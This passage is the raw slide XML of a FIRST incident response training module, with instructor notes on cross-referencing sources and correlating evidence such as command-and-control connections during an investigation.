              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST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626" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F42B114-743D-FF41-BBBA-0F68F0121CFA}"/>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6A9D781D-DEA9-5148-AA2D-0618ED8FF0EE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A52B88AE-766D-B442-8E02-8F62E1D1EC34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631825" y="4343400"/>
            <a:ext cx="5592763" cy="64484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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Investigation Continues with Cross-Referencing Sources: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>3 minutes</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> While performing investigations, there are many questions you need to ask, a few of which are listed onscreen. The answers, if applied intelligently, will lead you more effectively to the completion of your analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="363"/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Walk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> learners through the steps on the slide.</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Ask: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>What other questions can you think of?</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Instructor notes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Depending on your class, you may have many or no answers, so have a few other questions you can add.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26628" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8E3BD9D-F64A-154E-90FA-5A40FDAE9249}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{435C11F1-BFE5-1E43-95E5-C4F119720A5B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26629" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{961C2CBA-ABCB-4E43-9191-805477B21BC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST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674" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5BEF13B-961A-EA4B-A494-F7CD561B10EC}"/>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5894B332-2CE9-F842-B6A5-EE820BA89E25}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64094733-ECB5-4B4C-B479-A9416F6D71CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631825" y="4343400"/>
            <a:ext cx="5592763" cy="64484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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Investigation Continues with Cross-Referencing Sources: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>3 minutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="363"/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Before you can finalize your triage, you have to verify the accuracy of your incoming information. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="363"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>You’ll want to cross-check and authenticate low-level information by using information from other sources. Does the log file substantiate the alert you received? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="363"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Should you take the server offline and perform cyber-forensics on it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="363"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>This is somewhat cyclical, and more completeness leads to asking more questions. As you collect information, keep cycling back to the questions about the impact, the recurrence, any missing information, and possible actions to be taken to eliminate the threat. </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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Ask:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> Who has done a post-attack investigation on an infected server? What were your results? Did it lead you to a different conclusion? </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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Instructor notes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Because your target audience is more junior staff members, be prepared to give your own example from your experience or someone else.</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Segue: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Another key aspect of the investigation stage is correlation.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28676" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAA93F3B-7A17-0D42-9B50-233EA5D576D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{0993D6B7-7225-FC45-8C1C-520BAF7E57FF}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28677" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D428D158-31AC-2B46-A4C9-7B1B6B97ED7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST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22" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18039902-FA5A-0442-8412-96AB03C4B734}"/>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7F69811F-C770-CC45-9A11-1C0289F05403}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67585" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D995F6CE-EB0B-B24C-92F5-575FE4B4899C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325438" y="3409950"/>
            <a:ext cx="6205537" cy="7562850"/>
          </a:xfrm>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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Correlation Is Central to the Investigation Phase: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>4 minutes</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>The intent of correlation is to better understand the context of the input on which you are currently working. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>You’ll rely not just on the facts you have at this point, but on new facts you discover. For example, you find some malware on one laptop and during analysis you find it is migrating to other laptops on the same network but not beyond. This will tell you a lot about the propagation method of the infection. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>You’ll want spot patterns and unanticipated relationships. As an example, you collect information on all outgoing connections from one of your machines. Then you compare the outgoing addresses against known suspicious addresses. If one of those addresses can be identified as a command and control (C&amp;C) server, you can then search for additional suspected infections. In addition, if you can then obtain the MD5 hash, you can look into attachments on received emails to determine the userid that was targeted. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="352425" lvl="1" indent="-17303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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>And you should always leverage and correlate from other sources, for example, you’ll likely look at already-announced vulnerabilities that are available both from your vendors and also common sources such as your national or regional CSIRTs. While reviewing the new data you’ll want to check to see if it verifies your assumptions. That already-announced vulnerability might have similar, but not identical, symptoms. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Ask: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Talking about the example of malware on one laptop, what are all the other ways and sources we could check to perform correlation?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Instructor notes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1100">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Leave this as open as possible and let your students really expand the possibilities of sources they could reference. Often a narrow, assumptive position will keep you from seeing really interesting, unique, and significant conclusions.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30724" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8787713A-F921-904D-BCE7-8B8D012AACB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{D34FBC7E-A69D-8248-9F81-6475C97ED4E1}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30725" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58555DD8-0FC3-D146-84A1-B9CE0A11B586}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8931275"/>
            <a:ext cx="4954588"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST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770" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BF0FFE8-C47F-9142-9E20-C86DBB28EFC4}"/>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35E6B62F-FE43-4B49-88C6-C739BC5CA458}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68609" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10B837DD-B01A-204D-ABEF-8350F69723D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631825" y="4343400"/>
            <a:ext cx="5592763" cy="6448425"/>
          </a:xfrm>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215900" indent="-214313" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Correlation Is Central to the Investigation Phase: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
